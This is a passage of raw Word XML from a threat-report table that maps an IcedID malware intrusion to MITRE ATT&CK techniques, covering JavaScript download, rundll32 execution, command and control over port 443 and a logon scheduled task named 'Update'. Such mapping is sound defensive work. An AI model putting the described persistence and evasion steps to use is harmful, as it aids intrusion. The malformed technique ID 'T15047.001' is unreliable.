            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D03B27D" w14:textId="7951F51F" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1071.001 </w:t>
            </w:r>
            <w:r w:rsidR="000C3F20" w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="000C3F20" w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol : Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21E33B6E" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="256BB285" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FAC5DB4" w14:textId="3EC2FDC0" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00120A43" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02937D83" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F42CA20" w14:textId="1EA2CCB0" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00CF607E" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve">The JavaScript file would eventually download and execute the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>IcedID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve"> malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="6E408D19" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1587ABA3" w14:textId="09F2F198" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="006F1C7F" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10D0532D" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2313995A" w14:textId="77458B29" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1105</w:t>
            </w:r>
            <w:r w:rsidR="000C3F20" w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41EEC76B" w14:textId="0836F2CF" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00120A43" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="006536C8" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45F34124" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2016DB8C" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C/IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F14714" w14:textId="4D50A2D8" w:rsidR="00DD1FAC" w:rsidRPr="004A56C2" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00CF607E" w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="6048C812" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A5F1205" w14:textId="43053B66" w:rsidR="000C3F20" w:rsidRPr="004A56C2" w:rsidRDefault="000C3F20" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C430263" w14:textId="159F6F5F" w:rsidR="000C3F20" w:rsidRPr="004A56C2" w:rsidRDefault="000C3F20" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BF6F20" w14:textId="1B8DE86F" w:rsidR="000C3F20" w:rsidRPr="004A56C2" w:rsidRDefault="000C3F20" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1218.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> System Binary Proxy Execution: Rundll32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6816EC53" w14:textId="0CDF99B6" w:rsidR="000C3F20" w:rsidRPr="004A56C2" w:rsidRDefault="00E628F6" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="527513DA" w14:textId="77777777" w:rsidR="000C3F20" w:rsidRPr="004A56C2" w:rsidRDefault="000C3F20" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70877B04" w14:textId="288B8E52" w:rsidR="000C3F20" w:rsidRPr="004A56C2" w:rsidRDefault="00E628F6" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18874D14" w14:textId="323046E0" w:rsidR="000C3F20" w:rsidRPr="004A56C2" w:rsidRDefault="009B38C1" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19A4BF3A" w14:textId="072B0086" w:rsidR="000C3F20" w:rsidRPr="004A56C2" w:rsidRDefault="00E628F6" w:rsidP="00802231">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>IcedID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve"> was executed via rundll32.exe and ran command and control over port 443 for the duration of the intrusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="5672FFFA" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="430B0E6D" w14:textId="4F58254E" w:rsidR="00CF607E" w:rsidRPr="004A56C2" w:rsidRDefault="000C3F20" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A3538DA" w14:textId="4D6B8350" w:rsidR="00CF607E" w:rsidRPr="004A56C2" w:rsidRDefault="00120A43" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D2C117" w14:textId="5FD400D5" w:rsidR="00CF607E" w:rsidRPr="004A56C2" w:rsidRDefault="00120A43" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T15047.001 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E46442E" w14:textId="427FE1B0" w:rsidR="00CF607E" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48B274B9" w14:textId="77777777" w:rsidR="00CF607E" w:rsidRPr="004A56C2" w:rsidRDefault="00CF607E" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0134B926" w14:textId="61206620" w:rsidR="00CF607E" w:rsidRPr="004A56C2" w:rsidRDefault="00802231" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EAF9569" w14:textId="508F64A4" w:rsidR="00CF607E" w:rsidRPr="004A56C2" w:rsidRDefault="00120A43" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E55D587" w14:textId="4FBEADDA" w:rsidR="00802231" w:rsidRPr="004A56C2" w:rsidRDefault="00120A43" w:rsidP="00802231">
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
            <w:r w:rsidR="00802231" w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3]</w:t>
            </w:r>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00802231" w:rsidRPr="004A56C2">
              <w:t>IcedID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00802231" w:rsidRPr="004A56C2">
              <w:t xml:space="preserve"> sets up persistence by creating a Scheduled Task with the following characteristics:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DED9367" w14:textId="77777777" w:rsidR="00802231" w:rsidRPr="004A56C2" w:rsidRDefault="00802231" w:rsidP="00802231">
            <w:r w:rsidRPr="004A56C2">
              <w:t>* Name: Update</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3CBDE4" w14:textId="77777777" w:rsidR="00802231" w:rsidRPr="004A56C2" w:rsidRDefault="00802231" w:rsidP="00802231">
            <w:r w:rsidRPr="004A56C2">
              <w:t>* Trigger: At Log on</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B4DCE1C" w14:textId="77777777" w:rsidR="00802231" w:rsidRPr="004A56C2" w:rsidRDefault="00802231" w:rsidP="00802231">
            <w:r w:rsidRPr="004A56C2">
              <w:t>* Action: %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>LocalAppData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>%\$Example\\waroupada.exe /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1103B63D" w14:textId="52E8F2CB" w:rsidR="00CF607E" w:rsidRPr="004A56C2" w:rsidRDefault="00CF607E" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="6786F822" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1383B9A5" w14:textId="07016989" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F75AA23" w14:textId="2709EA66" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>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200CC73A" w14:textId="45E020BA" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1016 System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2543ACA0" w14:textId="50790F7D" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30424494" w14:textId="77777777" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="794D9C0F" w14:textId="3DFE5942" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3168D16E" w14:textId="1E2322CC" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
